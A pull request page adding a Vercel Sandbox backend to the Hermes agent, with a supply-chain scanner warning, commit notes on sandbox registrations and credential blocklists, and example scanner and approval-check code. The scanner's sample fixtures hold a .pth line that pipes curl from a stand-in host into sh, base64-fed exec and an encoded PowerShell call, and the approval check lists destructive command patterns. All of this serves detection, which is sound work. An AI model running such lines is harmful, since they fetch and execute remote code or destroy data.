feat: add Vercel Sandbox backend #17445
Adds Vercel Sandbox as a supported Hermes terminal backend alongside existing providers (Local, Docker, Modal, SSH, Daytona, Singularity). Uses the Vercel Python SDK to create/manage cloud microVMs, supports snapshot-based filesystem persistence keyed by task_id, and integrates with the existing BaseEnvironment shell contract and FileSyncManager for credential/skill syncing. Based on #17127 by @scotttrinh, cherry-picked onto current main.
🚨 CRITICAL Supply Chain Risk Detected
This PR contains a pattern that has been used in real supply chain attacks. A maintainer must review the flagged code carefully before merging.
🚨 CRITICAL: Install-hook file added or modified
These files can execute code during package installation or interpreter startup. Files:
Scanner only fires on high-signal indicators: .pth files, base64+exec/eval combos, subprocess with encoded commands, or install-hook files. Low-signal warnings were removed intentionally — if you're seeing this comment, the finding is worth inspecting.
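The four indicators the scanner comment names are cheap to detect but easy to get wrong with regexes alone. The block below is an added example written for this page, not the scanner that produced the comment and not Hermes project code: it walks the Python AST so that an `exec`/`eval` whose argument contains a decoder call is caught regardless of spacing, and treats `.pth` and install-hook files as findings by filename alone. The install-hook filename set, the finding labels and the sample PR contents are this example's assumptions and constructed input.

```python
"""Added example (not the scanner behind the comment above, not Hermes code):
a minimal scanner for the four high-signal supply-chain indicators it names.
The install-hook filename set, the labels and the sample PR are assumptions."""
import ast
import base64
import binascii
import os
import re

INSTALL_HOOK_FILES = {"setup.py", "sitecustomize.py", "usercustomize.py"}  # assumed set
DECODERS = {"b64decode", "b32decode", "b16decode", "a85decode", "b85decode"}
SUBPROCESS_FUNCS = {"run", "Popen", "call", "check_call", "check_output"}
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:enc|encodedcommand)(?:\s|$)")  # PowerShell -enc
SHELL_DECODE = re.compile(r"\bbase64\s+(?:-d|--decode)\b")                  # ... | base64 -d | sh
B64_BLOB = re.compile(r"^[A-Za-z0-9+/]{24,}={0,2}$")


def _dotted(expr):
    """'base64.b64decode' for a Name/Attribute chain, '' for anything else."""
    parts = []
    while isinstance(expr, ast.Attribute):
        parts.append(expr.attr)
        expr = expr.value
    if isinstance(expr, ast.Name):
        parts.append(expr.id)
        return ".".join(reversed(parts))
    return ""


def _strings(node):
    for n in ast.walk(node):
        if isinstance(n, ast.Constant) and isinstance(n.value, str):
            yield n.value


def _looks_encoded(s):
    """Encoded-command flag, shell-side base64 decode, or a long valid base64 blob."""
    if ENCODED_FLAG.search(s) or SHELL_DECODE.search(s):
        return True
    token = s.strip()
    if not B64_BLOB.match(token):
        return False
    try:
        return len(base64.b64decode(token, validate=True)) >= 16
    except binascii.Error:
        return False


def scan_file(path, source):
    """Return the indicator labels raised by one added/modified file."""
    findings = []
    name = os.path.basename(path)
    if name.endswith(".pth"):
        findings.append("pth-file")          # 'import x' lines run at every interpreter start
    if name in INSTALL_HOOK_FILES:
        findings.append("install-hook")
    if not name.endswith(".py"):
        return findings
    try:
        tree = ast.parse(source)
    except SyntaxError:
        return findings + ["unparseable-python"]
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        parts = _dotted(node.func).split(".")
        if parts[-1] in ("exec", "eval"):
            # any decoder call anywhere inside the argument expression
            if any(isinstance(inner, ast.Call) and _dotted(inner.func).split(".")[-1] in DECODERS
                   for arg in node.args for inner in ast.walk(arg)):
                findings.append("base64-exec")
        elif parts[0] == "subprocess" and parts[-1] in SUBPROCESS_FUNCS:
            argv = node.args + [kw.value for kw in node.keywords]
            if any(_looks_encoded(s) for arg in argv for s in _strings(arg)):
                findings.append("encoded-subprocess")
    return findings


def scan_pr(files):
    """files: {path: content}. Returns only the paths that raised a finding."""
    result = {}
    for path, content in files.items():
        hits = scan_file(path, content)
        if hits:
            result[path] = hits
    return result


# Constructed PR contents: a benign backend file, an install hook, a .pth hook
# and a helper with the exec/base64 and encoded-subprocess combos.
SAMPLE_PR = {
    "tools/environments/vercel_sandbox.py": "import os\n\ndef token():\n    return os.environ.get('VERCEL_TOKEN')\n",
    "setup.py": "from setuptools import setup\nsetup(name='example')\n",
    "site-packages/helper.pth": "import os; os.system('curl http://example.invalid/x | sh')\n",
    "build_helper.py": (
        "import base64, subprocess\n"
        "exec(base64.b64decode('cHJpbnQoMSk='))\n"
        "subprocess.run(['powershell', '-enc', 'UwB0AGEAcgB0AA=='])\n"
    ),
}

if __name__ == "__main__":
    for path, hits in scan_pr(SAMPLE_PR).items():
        print(f"{path}: {', '.join(hits)}")
```

A `.pth` file is reported without parsing because its `import` lines execute on every interpreter start whatever else it contains; `setup.py` is reported by name because it runs at install time even when its body is benign today. The two AST rules only fire on a decoder-fed `exec`/`eval` or a `subprocess` call carrying an encoded command, which is what keeps the signal high.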
Salvage of #17127 with stale-branch regressions resolved. Prior PR should be closed in favor of this one.
Salvage of #17127 |
- Add vercel_sandbox to hardline blocklist container bypass test
- Add vercel_sandbox to skills_tool remote backend parametrize test
- Deduplicate runtime set: doctor.py and setup.py now import _SUPPORTED_VERCEL_RUNTIMES from terminal_tool.py
- Add docstring to _run_bash explaining timeout/stdin_data discards
- Always stop sandbox during cleanup (unconditional, matching Modal/Daytona)
- Update security.md: container bypass text, production tip, comparison table
- Update environment-variables.md: TERMINAL_ENV list, Vercel auth vars, TERMINAL_VERCEL_RUNTIME
- Update inline comments in cli.py and config.py to include vercel_sandbox
Several cross-cutting registrations only listed the prior sandboxed backends (docker / singularity / modal / daytona / vercel_sandbox); Sprites is also a remote, hardware-isolated sandbox and needs the same treatment. Without this, the agent path on a Sprites backend hits false dangerous-command approval prompts, leaks SPRITES_TOKEN to local-backend subprocesses, and silently drops container_persistent overrides from the code_execution_tool / file_tools dispatch paths.
- tools/approval.py: add "sprites" to both sandboxed-backend skip sets (the agent's command is running inside the Sprite, not on the host — same isolation guarantee as the other cloud backends).
- tools/environments/local.py: add SPRITES_TOKEN / SPRITE_TOKEN to the provider env blocklist so they are stripped from local-backend child process environments (matches the VERCEL_*, DAYTONA_API_KEY, and MODAL_TOKEN_* treatment).
- tools/skills_tool.py: add "sprites" to _REMOTE_ENV_BACKENDS so the skills tool routes its remote/local distinction correctly.
- tools/file_tools.py: add "sprites" to the container_config dispatch set so container_persistent: false can take effect through the file-tool code path.
- tools/code_execution_tool.py: same dispatch fix (I had removed it in 015e4fe5b on the grounds that sprites ignores CPU/memory/disk — but container_persistent IS honored).
- hermes_cli/web_server.py: add "sprites" to the dashboard's terminal.backend select-control options.
Surfaced by comparing this branch against NousResearch#17445 (the Vercel Sandbox backend PR), which had to make every one of these registrations explicitly. Same audit applies here.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
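Two of the registrations in the commit message above are worth seeing as code: the provider-credential blocklist that the local backend applies to its child process environment, and the sandboxed-backend set for which the dangerous-command approval check is skipped because the sandbox, not the host, is the security boundary. The block below is an added example written for this page, not Hermes code. The environment variable names and backend names are the ones the commit message lists; grouping the VERCEL_* and MODAL_TOKEN_* entries by prefix, the toy dangerous-command patterns, the function names and the sample environment are this example's assumptions.

```python
"""Added example (not Hermes code): credential stripping for the local backend
plus the sandboxed-backend skip for dangerous-command approval. Variable and
backend names follow the commit message; everything else is assumed."""
import os
import re
import subprocess
import sys

# Credentials that must never reach a child process spawned by the local backend.
PROVIDER_ENV_EXACT = frozenset({"DAYTONA_API_KEY", "SPRITES_TOKEN", "SPRITE_TOKEN"})
PROVIDER_ENV_PREFIXES = ("VERCEL_", "MODAL_TOKEN_")

# Backends whose commands run inside a remote sandbox; that sandbox is the
# security boundary, so the host-protecting approval check is skipped for them.
SANDBOXED_BACKENDS = frozenset(
    {"docker", "singularity", "modal", "daytona", "vercel_sandbox", "sprites"}
)

# Assumed toy list; a real check is far more thorough.
DANGEROUS_PATTERNS = (
    re.compile(r"\brm\s+(-[A-Za-z]*r[A-Za-z]*\s+)+(/|~|\*)(\s|$)"),  # rm -rf / , rm -rf ~
    re.compile(r"\bmkfs(\.\w+)?\b"),
    re.compile(r"\bdd\b.*\bof=/dev/"),
    re.compile(r":\(\)\s*\{\s*:\|:&\s*\};:"),                          # fork bomb
)


def scrub_env(env):
    """Copy of env without provider credentials, by exact name or by prefix."""
    return {
        k: v
        for k, v in env.items()
        if k not in PROVIDER_ENV_EXACT and not k.startswith(PROVIDER_ENV_PREFIXES)
    }


def needs_approval(backend, command):
    """True when the command should be shown to the user before it runs."""
    if backend in SANDBOXED_BACKENDS:
        return False
    return any(p.search(command) for p in DANGEROUS_PATTERNS)


def child_sees(var, env):
    """Spawn a child with the scrubbed env and report what it observes for var.

    This is the check worth keeping in a test suite: the blocklist is only
    effective if the child process, not just the parent dict, lacks the token."""
    proc = subprocess.run(
        [sys.executable, "-c",
         "import os, sys; print(os.environ.get(sys.argv[1], '<unset>'))", var],
        env=scrub_env(env), capture_output=True, text=True, check=True,
    )
    return proc.stdout.strip()


# Constructed sample environment as a local backend might inherit it; the
# individual VERCEL_*/MODAL_TOKEN_* names are illustrative.
SAMPLE_ENV = {
    "PATH": os.environ.get("PATH", "/usr/bin:/bin"),
    "HOME": "/home/agent",
    "VERCEL_TOKEN": "vc-secret",
    "VERCEL_TEAM_ID": "team_123",
    "MODAL_TOKEN_ID": "ak-123",
    "MODAL_TOKEN_SECRET": "as-123",
    "DAYTONA_API_KEY": "dtn-secret",
    "SPRITES_TOKEN": "spr-secret",
}

if __name__ == "__main__":
    print(sorted(scrub_env(SAMPLE_ENV)))
    print(child_sees("SPRITES_TOKEN", SAMPLE_ENV), child_sees("HOME", SAMPLE_ENV))
    for backend in ("local", "sprites"):
        print(backend, needs_approval(backend, "rm -rf /"))
```

The skip in `needs_approval` is only safe while the backend set is exactly the set of backends that execute off-host; a backend added to the environment registry but missed here fails open in the other direction (spurious prompts rather than missing ones), which is the symptom the commit message describes.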
Mirrors the placement vercel_sandbox got in PR NousResearch#17445:
- features/tools.md: row in the backend comparison table, "sprites" added to the backend-enum comment, and a dedicated "Sprites (Fly.io)" subsection covering install + auth, the hermes-{task_id} resume model, the restricted-token recommendation for CI / shared envs, the persistence semantics, and the "no sync-back, by design" rationale.
- security.md: container-bypass info note and production-tip paragraph both mention sprites; comparison table gains a row showing dangerous-command checks are skipped (because the Sprite is the security boundary).
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Summary
Salvage of #17127 by @scotttrinh — cherry-picked onto current main to avoid stale-branch regressions.
What this PR does: Adds Vercel Sandbox as a supported Hermes terminal backend alongside existing providers (Local, Docker, Modal, SSH, Daytona, Singularity). Uses the Vercel Python SDK to create/manage cloud microVMs, supports snapshot-based filesystem persistence keyed by task_id, and integrates with the existing BaseEnvironment shell contract and FileSyncManager for credential/skill syncing.
Why salvage was needed
The original PR was 115 commits behind main. Its gateway/run.py diff included 128 lines of unrelated deletions that would silently revert ~12 recently-merged features (platform connect timeout, cfg_get migration, tilde expansion, docker bridges, progress bubble reset, curator cron tick, etc.).
Changes from original PR
Commit 1 (cherry-pick by @scotttrinh):
- vercel_runtime bridge) — all stale-branch regressions discarded
- cfg_get import after conflict resolution
Commit 2 (self-review follow-up):
- Add vercel_sandbox to hardline blocklist container bypass test
- Add vercel_sandbox to skills_tool remote backend parametrize test
- doctor.py and setup.py now import _SUPPORTED_VERCEL_RUNTIMES from terminal_tool.py (was hardcoded 5×)
- Add docstring to _run_bash explaining timeout/stdin_data discards
- Update security.md: container bypass text, production tip, comparison table
- Update environment-variables.md: TERMINAL_ENV list, Vercel auth vars, TERMINAL_VERCEL_RUNTIME
- Update inline comments in cli.py and config.py to include vercel_sandbox
Test results